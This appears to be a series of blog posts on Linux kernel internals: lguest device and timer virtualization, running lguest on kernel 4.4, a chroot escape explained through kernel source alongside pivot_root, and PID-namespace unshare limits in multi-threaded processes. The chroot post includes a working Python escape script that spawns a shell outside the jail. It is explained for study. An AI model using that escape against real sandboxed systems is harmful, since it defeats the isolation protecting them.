            bool deliver_trap(struct lg_cpu *cpu, unsigned int num)
            {
            /*
            * Trap numbers are always 8 bit, but we set an impossible trap number
            * for traps inside the Switcher, so check that here.
            */
            if (num >= ARRAY_SIZE(cpu->arch.idt))
                    return false;

            /*
            * Early on the Guest hasn't set the IDT entries (or maybe it put a
            * bogus one in): if we fail here, the Guest will be killed.
            */
            if (!idt_present(cpu->arch.idt[num].a, cpu->arch.idt[num].b))
                    return false;
            push_guest_interrupt_stack(cpu, has_err(num));
            guest_run_interrupt(cpu, cpu->arch.idt[num].a,
                            cpu->arch.idt[num].b);
            return true;
            }

            static void guest_run_interrupt(struct lg_cpu *cpu, u32 lo, u32 hi)
            {
                    /* If we're already in the kernel, we don't change stacks. */
                    if ((cpu->regs->ss&0x3) != GUEST_PL)
                            cpu->regs->ss = cpu->esp1;

                    /*
                    * Set the code segment and the address to execute.
                    */
                    cpu->regs->cs = (__KERNEL_CS|GUEST_PL);
                    cpu->regs->eip = idt_address(lo, hi);

                    /*
                    * Trapping always clears these flags:
                    * TF: Trap flag
                    * VM: Virtual 8086 mode
                    * RF: Resume
                    * NT: Nested task.
                    */
                    cpu->regs->eflags &=
                            ~(X86_EFLAGS_TF|X86_EFLAGS_VM|X86_EFLAGS_RF|X86_EFLAGS_NT);

                    /*
                    * There are two kinds of interrupt handlers: 0xE is an "interrupt
                    * gate" which expects interrupts to be disabled on entry.
                    */
                    if (idt_type(lo, hi) == 0xE)
                            if (put_user(0, &cpu->lg->lguest_data->irq_enabled))
                                    kill_guest(cpu, "Disabling interrupts");
            }

Direct trap

Returning to the host every time a trap happens and then calling deliver_trap and re-entering the guest is slow. So we can set up the IDT to tell the CPU to execute the guest interrupt handler directly with no lguest involvement. When the guest set interrupt gate, the lguest will check whether this setting is allowed. Only a little interrupt is allowed to set such as the system call. When the interrupt is triggered, the guest kernel will just jump to the handler it sets(just like there is no hypervisor).

Device virtualization

lguest just supports the basic virtio devices including net/block/console/rng. The device memory space is just located after the guest normal memory. All devices is virtio device attached to the PCI host bridge. All devices is put in the global variable ‘devices’.

            struct device_list {
                    /* Counter to assign interrupt numbers. */
                    unsigned int next_irq;

                    /* Counter to print out convenient device numbers. */
                    unsigned int device_num;

                    /* PCI devices. */
                    struct device *pci[MAX_PCI_DEVICES];
            };

            /* The list of Guest devices, based on command line arguments. */
            static struct device_list devices;

Let’s take the console device as an example. ‘new_pci_device’ creates the pci device, ‘add_pci_virtqueue’ sets the input/output handler of virtio. ‘add_pci_feature’ adds the device feature.

            static void setup_console(void)
            {
                    struct device *dev;
                    struct virtio_console_config conf;

                    /* If we can save the initial standard input settings... */
                    if (tcgetattr(STDIN_FILENO, &orig_term) == 0) {
                            struct termios term = orig_term;
                            /*
                            * Then we turn off echo, line buffering and ^C etc: We want a
                            * raw input stream to the Guest.
                            */
                            term.c_lflag &= ~(ISIG|ICANON|ECHO);
                            tcsetattr(STDIN_FILENO, TCSANOW, &term);
                    }

                    dev = new_pci_device("console", VIRTIO_ID_CONSOLE, 0x07, 0x00);

                    /* We store the console state in dev->priv, and initialize it. */
                    dev->priv = malloc(sizeof(struct console_abort));
                    ((struct console_abort *)dev->priv)->count = 0;

                    /*
                    * The console needs two virtqueues: the input then the output.  When
                    * they put something the input queue, we make sure we're listening to
                    * stdin.  When they put something in the output queue, we write it to
                    * stdout.
                    */
                    add_pci_virtqueue(dev, console_input, "input");
                    add_pci_virtqueue(dev, console_output, "output");

                    /* We need a configuration area for the emerg_wr early writes. */
                    add_pci_feature(dev, VIRTIO_CONSOLE_F_EMERG_WRITE);
                    set_device_config(dev, &conf, sizeof(conf));

                    verbose("device %u: console\n", devices.device_num);
            }

When the lguest receives data the ‘console_input’ will be called and when the guest kernel write data to console the ‘console_output’ will be called.

How guest kernel find and enumerate these PCI devices? When the guest tries to enumerate the PCI devices it will access the PCI_CONFIG_ADDR (0xcf8) and PCI_CONFIG_DATA(0xcfc) ports. These access will delivered to lguest userspace and ‘emulate_insn’ will try to emulate these access.

When the port is in PCI_CONFIG_ADDR or PCI_CONFIG_DATA, it will call the pci-related function.

            static void emulate_insn(const u8 insn[])
            {
                    unsigned long args[] = { LHREQ_TRAP, 13 };
                    unsigned int insnlen = 0, in = 0, small_operand = 0, byte_access;
                    unsigned int eax, port, mask;
                    ...
                    eax = getreg(eax);

                    if (in) {
                            /* This is the PS/2 keyboard status; 1 means ready for output */
                            if (port == 0x64)
                                    val = 1;
                            else if (is_pci_addr_port(port))
                                    pci_addr_ioread(port, mask, &val);
                            else if (is_pci_data_port(port))
                                    pci_data_ioread(port, mask, &val);

                            /* Clear the bits we're about to read */
                            eax &= ~mask;
                            /* Copy bits in from val. */
                            eax |= val & mask;
                            /* Now update the register. */
                            setreg(eax, eax);
                    } else {
                            if (is_pci_addr_port(port)) {
                                    if (!pci_addr_iowrite(port, mask, eax))
                                            goto bad_io;
                            } else if (is_pci_data_port(port)) {
                                    if (!pci_data_iowrite(port, mask, eax))
                                            goto bad_io;
                            }
                            /* There are many other ports, eg. CMOS clock, serial
                            * and parallel ports, so we ignore them all. */
                    }
            ...
            }

For example when the guest triggers a ‘pci_data_ioread’, we will find the pci device and return the data to guest.

            static void pci_data_ioread(u16 port, u32 mask, u32 *val)
            {
                    u32 reg;
                    struct device *d = dev_and_reg(&reg);

                    if (!d)
                            return;

                    /* Read through the PCI MMIO access window is special */
                    if (&d->config_words[reg] == &d->config.cfg_access.pci_cfg_data) {
                            u32 read_mask;

                            /*
                            * 4.1.4.7.1:
                            *
                            *  Upon detecting driver read access to pci_cfg_data, the
                            *  device MUST execute a read access of length cap.length at
                            *  offset cap.offset at BAR selected by cap.bar and store the
                            *  first cap.length bytes in pci_cfg_data.
                            */
                            /* Must be bar 0 */
                            if (!valid_bar_access(d, &d->config.cfg_access))
                                    bad_driver(d,
                                    "Invalid cfg_access to bar%u, offset %u len %u",
                                    d->config.cfg_access.cap.bar,
                                    d->config.cfg_access.cap.offset,
                                    d->config.cfg_access.cap.length);

                            /*
                            * Read into the window.  The mask we use is set by
                            * len, *not* this read!
                            */
                            read_mask = (1ULL<<(8*d->config.cfg_access.cap.length))-1;
                            d->config.cfg_access.pci_cfg_data
                                    = emulate_mmio_read(d,
                                                    d->config.cfg_access.cap.offset,
                                                    read_mask);
                            verbose("Window read %#x/%#x from bar %u, offset %u len %u\n",
                                    d->config.cfg_access.pci_cfg_data, read_mask,
                                    d->config.cfg_access.cap.bar,
                                    d->config.cfg_access.cap.offset,
                                    d->config.cfg_access.cap.length);
                    }
                    ioread(port - PCI_CONFIG_DATA, d->config_words[reg], mask, val);
            }

When the guest writes the devices’ MMIO address, it will trigger a page fault trap and this will be delivered to userspace and the guest will emulate these access.

            static void __attribute__((noreturn)) run_guest(void)
            {
                    for (;;) {
                            struct lguest_pending notify;
                            int readval;

                            /* We read from the /dev/lguest device to run the Guest. */
                            readval = pread(lguest_fd, &notify, sizeof(notify), cpu_id);
                            if (readval == sizeof(notify)) {
                                    if (notify.trap == 13) {
                                            verbose("Emulating instruction at %#x\n",
                                                    getreg(eip));
                                            emulate_insn(notify.insn);
                                    } else if (notify.trap == 14) {
                                            verbose("Emulating MMIO at %#x\n",
                                                    getreg(eip));
                                            emulate_mmio(notify.addr, notify.insn);
                                    } else
                                            errx(1, "Unknown trap %i addr %#08x\n",
                                            notify.trap, notify.addr);
                            /* ENOENT means the Guest died.  Reading tells us why. */
                            } else if (errno == ENOENT) {
                                    char reason[1024] = { 0 };
                                    pread(lguest_fd, reason, sizeof(reason)-1, cpu_id);
                                    errx(1, "%s", reason);
                            /* ERESTART means that we need to reboot the guest */
                            } else if (errno == ERESTART) {
                                    restart_guest();
                            /* Anything else means a bug or incompatible change. */
                            } else
                                    err(1, "Running guest failed");
                    }
            }

Guest Time

Guest wall clock is got from ‘cpu->lg->lguest_data->time’. When initialization and every interrupt injection ‘write_timestamp’ will be called to update the wall clock.

            void write_timestamp(struct lg_cpu *cpu)
            {
                    struct timespec now;
                    ktime_get_real_ts(&now);
                    if (copy_to_user(&cpu->lg->lguest_data->time,
                                    &now, sizeof(struct timespec)))
                            kill_guest(cpu, "Writing timestamp");
            }

lguest implements several timer-related callbacks. The first is ‘x86_init.timers.timer_init’. The most important function is the ‘set_next_event’ of ‘lguest_clockevent’.

            x86_init.timers.timer_init = lguest_time_init;

            static void lguest_time_init(void)
            {
                    /* Set up the timer interrupt (0) to go to our simple timer routine */
                    if (lguest_setup_irq(0) != 0)
                            panic("Could not set up timer irq");
                    irq_set_handler(0, lguest_time_irq);

                    clocksource_register_hz(&lguest_clock, NSEC_PER_SEC);

                    /* We can't set cpumask in the initializer: damn C limitations!  Set it
                    * here and register our timer device. */
                    lguest_clockevent.cpumask = cpumask_of(0);
                    clockevents_register_device(&lguest_clockevent);

                    /* Finally, we unblock the timer interrupt. */
                    clear_bit(0, lguest_data.blocked_interrupts);
            }


            static struct clock_event_device lguest_clockevent = {
                    .name                   = "lguest",
                    .features               = CLOCK_EVT_FEAT_ONESHOT,
                    .set_next_event         = lguest_clockevent_set_next_event,
                    .set_state_shutdown	= lguest_clockevent_shutdown,
                    .rating                 = INT_MAX,
                    .mult                   = 1,
                    .shift                  = 0,
                    .min_delta_ns           = LG_CLOCK_MIN_DELTA,
                    .max_delta_ns           = LG_CLOCK_MAX_DELTA,
            };

            static int lguest_clockevent_set_next_event(unsigned long delta,
                                                    struct clock_event_device *evt)
            {
                    /* FIXME: I don't think this can ever happen, but James tells me he had
                    * to put this code in.  Maybe we should remove it now.  Anyone? */
                    if (delta < LG_CLOCK_MIN_DELTA) {
                            if (printk_ratelimit())
                                    printk(KERN_DEBUG "%s: small delta %lu ns\n",
                                    __func__, delta);
                            return -ETIME;
                    }

                    /* Please wake us this far in the future. */
                    hcall(LHCALL_SET_CLOCKEVENT, delta, 0, 0, 0);
                    return 0;
            }

Then this callback is called by the timer subsystem, a LHCALL_SET_CLOCKEVENT hypercall is issued. ‘guest_set_clockevent’ is called to handle this hypercall. This function just starts a timer and when the timer is alarmed an timer interrupt using irq(0) will be inject to the guest.

            void guest_set_clockevent(struct lg_cpu *cpu, unsigned long delta)
            {
                    ktime_t expires;

                    if (unlikely(delta == 0)) {
                            /* Clock event device is shutting down. */
                            hrtimer_cancel(&cpu->hrt);
                            return;
                    }

                    /*
                    * We use wallclock time here, so the Guest might not be running for
                    * all the time between now and the timer interrupt it asked for.  This
                    * is almost always the right thing to do.
                    */
                    expires = ktime_add_ns(ktime_get_real(), delta);
                    hrtimer_start(&cpu->hrt, expires, HRTIMER_MODE_ABS);
            }

            /* This is the function called when the Guest's timer expires. */
            static enum hrtimer_restart clockdev_fn(struct hrtimer *timer)
            {
                    struct lg_cpu *cpu = container_of(timer, struct lg_cpu, hrt);

                    /* Remember the first interrupt is the timer interrupt. */
                    set_interrupt(cpu, 0);
                    return HRTIMER_NORESTART;
            }

            /* This sets up the timer for this Guest. */
            void init_clockdev(struct lg_cpu *cpu)
            {
                    hrtimer_init(&cpu->hrt, CLOCK_REALTIME, HRTIMER_MODE_ABS);
                    cpu->hrt.function = clockdev_fn;
            }

Summary

lguest is a paravirt virtualization solution which can run virtual machine without the hardware support. The guest kernel need to be modified to run in lguest.

For CPU virtualization, the lguest maps switcher code to both guest and host (in the same virtual address). The switcher is used to switch between guest and host.

For memory virtualization, it uses shadow page table which does translation from gva to hpa. This is the most performance overhead.

For device virtualization, the lugest implements devices in lguest userspace tool and intercepts the PCI IO port access and manages the PCI devices. All support is virtio devices.

There is no interrupt controller like APIC or IOAPI device. The devices’ interrupt is injected by adjusting the eip of guest before run guest code. And the guest trap is intercepted by lguest.

Run lguest on Linux kernel 4.4

2024-09-08T00:00:00+00:00

Background

Recently, I am preparing to study the PVM solution proposed by the Linux kernel expert Lai Jiangshan. After a brief review of the paper and the patch, I found that it needs a deep understanding of paravirtualization to understand it. When I entered the field of virtualization, KVM had already dominated the virtualization field, so I did not study the implementation of paravirtualization solutions like lguest/xen from a code perspective at that time. In order to learn PVM, I must gain a more thorough understanding of lguest and xen.

lguest is the simplest paravirtualization solution, which is very suitable for learning. It was integrated into the Linux kernel in version 2.6.23 and removed in version 4.14. With the spirit of “true engineers get their hands dirty,” I am ready to run lguest right away. Of course, it is not surprising that, following the documentation, I began to set up the environment and then encountered failures, which is typical for open-source projects. This article records the problems I encountered and how I resolved them. I hope it can provide some help to the people in the field of virtualization.

The issue

I create a VirtualBox VM and install an Ubuntu 16.04 OS in it. I choose Ubuntu 16.04 because it uses 4.4 kernel version and is a LTS version. In order to run lguest, we need prepare following:

Prepare the host kernel(the lg module) and the guest kernel
The initrd file and the rootfs file
build lguest userspace tool(like qemu)

Build kernel

Then I download Linux kernel 4.4 source code as 4.4 is the Ubuntu 16.04 shiped with 4.4 kernel. Following the instruction. I build the same kernel as guest and host. Some of the configuration:

            ## CONFIG_EXPERIMENTAL=y // no available
            CONFIG_PARAVIRT=y
            CONFIG_LGUEST_GUEST=y
            CONFIG_HIGHMEM64G=n
            CONFIG_PHYSICAL_ALIGN=0x100000
            CONFIG_VIRTIO_BLK=m
            CONFIG_VIRTIO_NET=m
            CONFIG_TUN=m
            CONFIG_LGUEST=m

Download initrd and rootfs file

I download initrd from here I download rootfs from here

Run it

In the Linux kerne soruce tree tools/lguest, type ‘make’ to build lguest userspace tool. Using following command to run lguest.

            modprobe lg
            ./lguest 64m /home/test/linux-4.4/vmlinux --tunnet=192.168.19.1 --initrd=/home/test/lguest/initrd-1.1-i386.img --block=/home/test/lguest/CentOS6.x-x86-root_fs  root=/etc/vda

As we can see we get an error “lguest: Reinjecting trap 13 for fault at 0x1afaeaa: Invalid argument”.

The solution

First issue: general protection fault

After reading the code, I know this is the gpf error casued by the guest. When dispatched to lguest, it can’t emulate so report this error. Let’s first print the instruction. Add following printf to lguest.c file.

            default:
                    /* OK, we don't know what this is, can't emulate. */
                    printf("can't emulate:%x %x %x\n", insn[0], insn[1], insn[2]);
                    goto no_emulate;
            }

Let’s disassemble vmlinux binary and find where this instruction comes.

            root@test-VirtualBox:~/lguest# objdump  -S /home/test/linux-4.4/vmlinux > vmlinux1.S
            root@test-VirtualBox:~/lguest# cat vmlinux1.S  | grep "65 a1 14"  | grep afaeaa
            c1afaeaa:	65 a1 14 00 00 00    	mov    %gs:0x14,%eax

It’s the prologue of function ‘load_ucode_intel_bsp’. The fault instruction is ‘move %gs:0x14,%eax’.

After some investigation, I know this instruction is introduced about ‘stack protector’. So I just build another kernel without stack canary.

            make "KCFLAGS=-fno-stack-protector" -j6

After building, let’s try.

Second issue: rdmsr

Another issue. Let’s just go to 0x1034c25 to see what it is.

It’s ‘rdmsr’ has 2 lenght instruction. Let’s just ignore this instruction. Add following code to lguest.c.

            if (insn[insnlen] == 0x0f) {
                    insnlen = 2;
                    printf("ignore readmsr\n");
                    goto skip_insn;
            }

After this patch, we finally run lguest successfully.

The rdmsr instruction is also called from ‘load_ucode_bsp’ call chain.

Analysis

There are two questions I don’t understand currently.

why ‘move %gs:0x14,%eax’ instruction cause gpf
why the guest uses native_rdmsr instead of pv rdmsr as ‘rdmsr’ is privileged instruction

For the first issue I read the SDM and found the clue at Volume 2 Chapter 4.3 Instruction(M-U). At the MOV-Move part:

And in the function ‘lguest_arch_setup_regs’: Only the ‘cs/ds/es/ss’ is initialized and the ‘gs’ is not initialized.

For the second issue after look at the ‘load_ucode_bsp’ I know the reason.

Here ‘call load_ucode_bsp’ is called by the kernel entrypoint(startup_32). And this function is called before the lguest initialization(lguest_init). When ‘load_ucode_bsp’ is called, the gs segment is not initialized and then cause a gpf. Aslo this function call invoke the ‘native_rdmsr’ directly and which execute the instruction ‘rdmsr’ and causes the second issue.

We can notice we can eliminate this function by set CONFIG_MICROCODE=n. I have tried this, it can work without modifying any lguest code.

The anatomy of chroot escape

2024-05-25T00:00:00+00:00

Recently I have read the old chroot escape methods in Linux. Using two chroot syscall can escape a chroot environment. I found there is no detailed article describing how it works underneath so I just write this post.

Reproduce

This part shows how we can escape the chroot environment. First let’s create a rootfs.

            root@test-VirtualBox:/tmp# mkdir chroottest
            root@test-VirtualBox:/tmp# cd  chroottest/
            root@test-VirtualBox:/tmp/chroottest# ls
            root@test-VirtualBox:/tmp/chroottest# mkdir usr
            root@test-VirtualBox:/tmp/chroottest# mount --bind /usr usr
            root@test-VirtualBox:/tmp/chroottest# ln -s usr/lib lib
            root@test-VirtualBox:/tmp/chroottest# ln -s usr/lib64 lib64
            root@test-VirtualBox:/tmp/chroottest# ln -s usr/bin bin
            root@test-VirtualBox:/tmp/chroottest# chroot .
            bash-5.0# ls /
            bin  lib  lib64  usr
            bash-5.0# exit
            exit
            root@test-VirtualBox:/tmp/chroottest# 

Create a test.py file in this rootfs.

            import os
            if not os.path.exists("chroot"):
            os.mkdir("chroot")
            os.chroot("chroot")
            os.chdir("../../../../../../..")
            os.chroot(".")
            os.system("/bin/sh")

Execute this test.py in the chroot environment. Then we can see we have escaped from the chroot environment.

            root@test-VirtualBox:/tmp/chroottest# ls
            bin  lib  lib64  test.py  usr
            root@test-VirtualBox:/tmp/chroottest# chroot .
            bash-5.0# ls /
            bin  lib  lib64  test.py  usr
            bash-5.0# python3 /test.py
            # ls /
            bin   cdrom  etc   lib          lib64   lost+found  mnt  proc  run   snap  swapfile  test  usr
            boot  dev    home  lib32  libx32  media       opt  root  sbin  srv   sys       tmp   var

The underneath

Let’s comment out the first chroot.

            root@test-VirtualBox:/tmp/chroottest# cat test.py 
            import os
            #if not os.path.exists("chroot"):
            #    os.mkdir("chroot")
            #os.chroot("chroot")
            os.chdir("../../../../../../..")
            os.chroot(".")
            os.system("/bin/sh")
            root@test-VirtualBox:/tmp/chroottest# chroot .
            bash-5.0# ls /
            bin  chroot  lib  lib64  test.py  usr
            bash-5.0# python3 /test.py
            # ls /
            bin  chroot  lib  lib64  test.py  usr
            # 

As we can see, if we don’t call the first chroot we can’t escape the chroot environment. Let’s dive into the internals. The chroot syscall is quite simple.

            SYSCALL_DEFINE1(chroot, const char __user *, filename)
            {
                    struct path path;
                    int error;
                    unsigned int lookup_flags = LOOKUP_FOLLOW | LOOKUP_DIRECTORY;
            retry:
                    error = user_path_at(AT_FDCWD, filename, lookup_flags, &path);
                    ...
                    if (!ns_capable(current_user_ns(), CAP_SYS_CHROOT))
                            goto dput_and_out;
                    error = security_path_chroot(&path);
                    if (error)
                            goto dput_and_out;
                    set_fs_root(current->fs, &path);
            ...
            }

It just calls ‘set_fs_root’ to set the ‘current->fs’ root path to the new directory. ‘chdir’ syscall is quite the same as ‘chroot’ syscall. The magic is the handle of ‘../../../’ in chdir, this is the core to escape the chroot environment. Let’s see how it works. chdir->user_path_at->user_path_at_empty->filename_lookup->path_lookupat. The ‘path_lookupat’ function begins the path lookup process, it’s quite complicated as the path can be complex. Here we only focus on the ‘follow_dotdot’ or ‘follow_dotdot_rcu’ funciton.

            static struct dentry *follow_dotdot(struct nameidata *nd)
            {
                    struct dentry *parent;
                    if (path_equal(&nd->path, &nd->root))
                            goto in_root;
                    if (unlikely(nd->path.dentry == nd->path.mnt->mnt_root)) {
                            ...
                    }
                    /* rare case of legitimate dget_parent()... */
                    parent = dget_parent(nd->path.dentry);
                    if (unlikely(!path_connected(nd->path.mnt, parent))) {
                            dput(parent);
                            return ERR_PTR(-ENOENT);
                    }
                    return parent;
            in_root:
                    if (unlikely(nd->flags & LOOKUP_BENEATH))
                            return ERR_PTR(-EXDEV);
                    return dget(nd->path.dentry);
            }

Here ‘path_equal’ compares the directory with the root, if the same the same, we just return. This means if our cwd is ‘/’, then if we execute ‘chdir(../../..)’ we will then still be in the ‘/’. What if we execute another ‘chroot’ in the chroot environment? The root directory of our process will be in a inner directory, but our current working directory will be outside the new root directory. If we execute ‘chdir’ then the ‘path_equal’ in ‘follow_dotdot’ will never be evaluated to be true and finally we will reach to the real root. After our cwd is the real root of filesystem, then we can execute ‘chroot(‘.’)’ to change the root directory to the real root. Finally we escape from the chroot environment.

chroot and pivot_chroot

As we can see the ‘chroot’ only changes the ‘root’ directory in task_struct, if the process has ‘CAP_CHROOT’ and it can escape the chroot environment easily. There is another syscall to change rootfs ‘pivot_root’. pivot_root() changes the root mount in the mount namespace of the calling process. More precisely, it moves the root mount to the directory put_old and makes new_root the new root mount. pivot_root() changes the root directory and the current working directory of each process or thread in the same mount namespace to new_root if they point to the old root directory.

            SYSCALL_DEFINE2(pivot_root, const char __user *, new_root,
                            const char __user *, put_old)
            {
                    struct path new, old, root;
                    struct mount *new_mnt, *root_mnt, *old_mnt, *root_parent, *ex_parent;
                    struct mountpoint *old_mp, *root_mp;
                    int error;
                    if (!may_mount())
                            return -EPERM;
                    error = user_path_at(AT_FDCWD, new_root,
                                    LOOKUP_FOLLOW | LOOKUP_DIRECTORY, &new);
                    if (error)
                            goto out0;
                    error = user_path_at(AT_FDCWD, put_old,
                                    LOOKUP_FOLLOW | LOOKUP_DIRECTORY, &old);

                    ...
                    /* mount old root on put_old 
            /
                    attach_mnt(root_mnt, old_mnt, old_mp);
            *        /*
            mount new_root on / 
            /
                    attach_mnt(new_mnt, root_parent, root_mp);
                    mnt_add_count(root_parent, -1);
                    touch_mnt_namespace(current->nsproxy->mnt_ns);
            *        /*
            A moved mount should not expire automatically */
                    list_del_init(&new_mnt->mnt_expire);
                    put_mountpoint(root_mp);
                    unlock_mount_hash();
                    chroot_fs_refs(&root, &new);
                    error = 0;
            ...
                    return error;
            }
            void chroot_fs_refs(const struct path *old_root, const struct path *new_root)
            {
                    struct task_struct *g, *p;
                    struct fs_struct *fs;
                    int count = 0;
                    read_lock(&tasklist_lock);
                    do_each_thread(g, p) {
                            task_lock(p);
                            fs = p->fs;
                            if (fs) {
                                    int hits = 0;
                                    spin_lock(&fs->lock);
                                    write_seqcount_begin(&fs->seq);
                                    hits += replace_path(&fs->root, old_root, new_root);
                                    hits += replace_path(&fs->pwd, old_root, new_root);
                                    write_seqcount_end(&fs->seq);
                                    while (hits--) {
                                            count++;
                                            path_get(new_root);
                                    }
                                    spin_unlock(&fs->lock);
                            }
                            task_unlock(p);
                    } while_each_thread(g, p);
                    read_unlock(&tasklist_lock);
                    while (count--)
                            path_put(old_root);
            }

Finally let’s craft a pivot_root use case.

            root@test-VirtualBox:/home/test/pivottest# mkdir rootfs
            root@test-VirtualBox:/home/test/pivottest# docker export $(docker create busybox) | tar -C rootfs -xvf -
            root@test-VirtualBox:/home/test/pivottest# unshare --user --mount --ipc --pid --net --uts -r --fork --propagation private bash
            root@test-VirtualBox:/home/test/pivottest# ls
            rootfs
            root@test-VirtualBox:/home/test/pivottest# mkdir rootfs/old_root
            root@test-VirtualBox:/home/test/pivottest# ls rootfs/old_root/
            root@test-VirtualBox:/home/test/pivottest# mount --bind rootfs rootfs
            root@test-VirtualBox:/home/test/pivottest# pivot_root ./rootfs ./rootfs/old_root/
            root@test-VirtualBox:/home/test/pivottest# exec sh
            /old_root/home/test/pivottest # ls
            rootfs
            /old_root/home/test/pivottest # ls /
            bin       etc       lib       old_root  root      tmp       var
            dev       home      lib64     proc      sys       usr
            /old_root/home/test/pivottest # ls /old_root
            bin         home        lost+found  root        swapfile    var
            boot        lib         media       run         sys
            cdrom       lib32       mnt         sbin        test
            dev         lib64       opt         snap        tmp
            etc         libx32      proc        srv         usr
            /old_root/home/test/pivottest # umount -l /old_root
            /old_root/home/test/pivottest # ls -lh /old_root
            total 0      
            / # rm old_root -rf
            / # ls
            bin    etc    lib    proc   sys    usr
            dev    home   lib64  root   tmp    var
            / # 

Ref

https://tbhaxor.com/breaking-out-of-chroot-jail-shell-environment/
https://github.com/Kevin-fqh/learning-k8s-source-code/blob/master/docker/(22)shell%E5%91%BD%E4%BB%A4%E5%88%9B%E5%BB%BA%E4%B8%80%E4%B8%AA%E7%AE%80%E5%8D%95%E7%9A%84%E5%AE%B9%E5%99%A8.md

Multi-thread process can't unshare pid namespace (in some old Linux version)

2024-05-01T00:00:00+00:00

The issue

When we unshare CLONE_NEWPID in a go program, we got an EINVAL error. Following is the test code.

            package main
            import (
                    "fmt"
                    "os"
                    "os/exec"
                    "syscall"
            )
            func main() {
                    // Unshare the PID namespace
                    if err := syscall.Unshare(syscall.CLONE_NEWPID); err != nil {
                            fmt.Fprintf(os.Stderr, "Error unsharing PID namespace: %v\n", err)
                            os.Exit(1)
                    }
                    // 此时，当前进程是新 PID namespace 中的第一个进程
                    // 运行一个 shell
                    cmd := exec.Command("/bin/sh")
                    // 设置文件描述符
                    cmd.Stdin = os.Stdin
                    cmd.Stdout = os.Stdout
                    cmd.Stderr = os.Stderr
                    // Run the command
                    if err := cmd.Run(); err != nil {
                            fmt.Fprintf(os.Stderr, "Error running shell: %v\n", err)
                            os.Exit(1)
                    }
                    fmt.Println("Exited shell")
            }

As we can see

            root@xxx:~# ./test
            Error unsharing PID namespace: invalid argument

This first surprises me as the Linux’s has supported pid namespace very long ago. After some tests, I found this only occurs in Linux 3.10.

The solution

Then I go to the unshare source.

Following code got my attention:

When the application specify CLONE_NEWPID, it also set the flags with CLONE_THREAD, CLONE_VM and CLONE_SIGHAND.

            SYSCALL_DEFINE1(unshare, unsigned long, unshare_flags)
            {
            ...
                    if (unshare_flags & CLONE_NEWPID)
                            unshare_flags |= CLONE_THREAD;
                    /*
                    * If unsharing a thread from a thread group, must also unshare vm.
                    
            /
                    if (unshare_flags & CLONE_THREAD)
                            unshare_flags |= CLONE_VM;
                    /
                    * If unsharing vm, must also unshare signal handlers.
                    */
                    if (unshare_flags & CLONE_VM)
                            unshare_flags |= CLONE_SIGHAND;
            ...
            }

Later in the unshare function it will check if the one of the CLONE_THREAD, CLONE_SIGHAND , CLONE_VM is set and the process has more than one threads, it will returen EINVAL.

            static int check_unshare_flags(unsigned long unshare_flags)
            {
            ...
            if (unshare_flags & (CLONE_THREAD | CLONE_SIGHAND | CLONE_VM)) {
                            /* FIXME: get_task_mm() increments ->mm_users */
                            if (atomic_read(&current->mm->mm_users) > 1)
                                    return -EINVAL; // this is the case
                    }
                    return 0;
            }

This means the multi-thread process can’t unshare PID namespace. This is introduced in the ‘unshare pid namespace’ commit. And later in this commit this behaviour is changed to allow multi-thread to unshare PID namespace. This error only occurs in Linux 3.8 to Linux 3.12.

The internals

When the unshare PID namespace is introduced(Linux 3.8), the multi-thread process is not allowed to unshare PID namespace. As the go program is multi-thread process so it will get an EINVAL when unshare PID namespace. Later in Linux 3.12 this restriction is lifted. Finally let’s test a complicated unshare PID namespace case. In this case:

we create two threads
the first thread unshare PID namespace and then create a new process
the second thread create a new process after the first thread unshare the PID namespace

Following is the code:

            #define _GNU_SOURCE
            #include <stdio.h>
            #include <stdlib.h>
            #include <pthread.h>
            #include <unistd.h>
            #include <sched.h>
            #include <sys/types.h>
            #include <sys/wait.h>
            #include <sys/syscall.h>
            // 用于同步的全局变量
            volatile int pid_namespace_unshared = 0;
            // 获取当前线程的线程ID
            pid_t gettid() {
            return syscall(SYS_gettid);
            }
            // 线程函数原型，unshare PID namespace
            void* thread_function_unshare(void* arg) {
            printf("Thread 1 (PID: %d, TID: %ld) is starting to unshare PID namespace...\n", getpid(), (long)gettid());

            // 尝试unshare PID namespace
            if (unshare(CLONE_NEWPID) == -1) {
                    perror("unshare");
                    exit(EXIT_FAILURE);
            }

            printf("Thread 1 (PID: %d, TID: %ld) has unshared PID namespace.\n", getpid(), (long)gettid());
            pid_namespace_unshared = 1; // 标记已完成unshare工作

            // 需要fork一个新进程来激活PID namespace
            pid_t pid = fork();
            if (pid == 0) {
                    // 子进程只需退出即可
                    printf("Child process of Thread 1 (PID: %d, TID: %ld) exiting to activate PID namespace.\n", getpid(), (long)gettid());
                    exit(EXIT_SUCCESS);
            } else if (pid > 0) {
                    // 父进程（线程1）等待新子进程退出
                    waitpid(pid, NULL, 0);
            } else {
                    perror("fork");
                    exit(EXIT_FAILURE);
            }

            return NULL;
            }
            // 线程函数原型，创建子进程并sleep
            void* thread_function_spawn_child(void* arg) {
            // 等待线程1完成unshare操作
            while (!pid_namespace_unshared) {
                    usleep(100); // 短暂休眠
            }

            printf("Thread 2 (PID: %d, TID: %ld) is spawning a child process...\n", getpid(), (long)gettid());

            pid_t pid = fork();
            if (pid == 0) {
                    // 子进程
                    printf("Child process of Thread 2 (PID: %d, TID: %ld) is starting to sleep for 20 seconds...\n", getpid(), (long)gettid());
                    sleep(20);
                    printf("Child process of Thread 2 (PID: %d, TID: %ld) has finished sleeping.\n", getpid(), (long)gettid());
                    exit(EXIT_SUCCESS);
            } else if (pid > 0) {
                    // 父进程（线程2）等待子进程退出
                    waitpid(pid, NULL, 0);
            } else {
                    perror("fork");
                    exit(EXIT_FAILURE);
            }

            return NULL;
            }
            int main() {
            printf("Main process (PID: %d, TID: %ld) is starting...\n", getpid(), (long)gettid());
            pthread_t thread1, thread2;
            // 创建线程1，用于unshare PID namespace
            if (pthread_create(&thread1, NULL, thread_function_unshare, NULL) != 0) {
                    perror("Failed to create thread 1");
                    return 1;
            }
            // 创建线程2，用于在线程1完成unshare后创建子进程
            if (pthread_create(&thread2, NULL, thread_function_spawn_child, NULL) != 0) {
                    perror("Failed to create thread 2");
                    return 1;
            }
            // 等待两个线程完成
            if (pthread_join(thread1, NULL) != 0) {
                    perror("Failed to join thread 1");
                    return 1;
            }
            if (pthread_join(thread2, NULL) != 0) {
                    perror("Failed to join thread 2");
                    return 1;
            }
            printf("Main process (PID: %d, TID: %ld) has finished executing.\n", getpid(), (long)gettid());
            return 0;
            }

Following show the output:

            root@xxx:~# ./test3
            Main process (PID: 1820, TID: 1820) is starting...
            Thread 1 (PID: 1820, TID: 1821) is starting to unshare PID namespace...
            Thread 1 (PID: 1820, TID: 1821) has unshared PID namespace.
